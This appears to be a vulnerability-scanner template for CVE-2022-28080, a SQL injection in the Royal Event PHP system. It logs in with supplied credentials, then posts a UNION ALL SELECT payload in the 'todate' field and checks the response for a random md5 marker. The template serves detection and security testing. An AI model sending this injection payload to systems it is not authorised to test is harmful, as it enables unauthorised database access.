id: CVE-2022-28080 info: name: Royal Event - SQL Injection author: lucasljm2001,ekrause,ritikchaddha severity: high description: | Royal Event is vulnerable to a SQL injection vulnerability. impact: | Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire database. remediation: | To remediate this vulnerability, input validation and parameterized queries should be implemented to prevent SQL Injection attacks. reference: - https://www.exploit-db.com/exploits/50934 - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip - https://github.com/erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated - https://nvd.nist.gov/vuln/detail/CVE-2022-28080 - https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-28080 cwe-id: CWE-89 epss-score: 0.01461 epss-percentile: 0.86424 cpe: cpe:2.3:a:event_management_system_project:event_management_system:1.0:*:*:*:*:*:*:* metadata: max-request: 2 vendor: event_management_system_project product: event_management_system tags: cve,cve2022,royalevent,edb,sqli,authenticated,cms,intrusive,event_management_system_project http: - raw: - | POST /royal_event/ HTTP/1.1 Host: {{Hostname}} Content-Length: 353 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD ------WebKitFormBoundaryCSxQll1eihcqgIgD Content-Disposition: form-data; name="username" {{username}} ------WebKitFormBoundaryCSxQll1eihcqgIgD Content-Disposition: form-data; name="password" {{password}} ------WebKitFormBoundaryCSxQll1eihcqgIgD Content-Disposition: form-data; name="login" ------WebKitFormBoundaryCSxQll1eihcqgIgD-- - | POST /royal_event/btndates_report.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD ------WebKitFormBoundaryFboH5ITu7DsGIGrD Content-Disposition: form-data; name="todate" 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5("{{randstr}}"),0x1,0x2),NULL-- - ------WebKitFormBoundaryFboH5ITu7DsGIGrD Content-Disposition: form-data; name="search" 3 ------WebKitFormBoundaryFboH5ITu7DsGIGrD Content-Disposition: form-data; name="fromdate" 01/01/2011 ------WebKitFormBoundaryFboH5ITu7DsGIGrD-- matchers-condition: and matchers: - type: word words: - '{{md5("{{randstr}}")}}' - type: status status: - 200 # digest: 490a0046304402206f49180b6302f9fef0412af1682487a99e8e841803be35372ea552f7878da30e022034287c08d99ef3e984b6ba91845fc4b18462d620c01f5ea9326718da215d237f:922c64590222798bb761d5b6d8e72950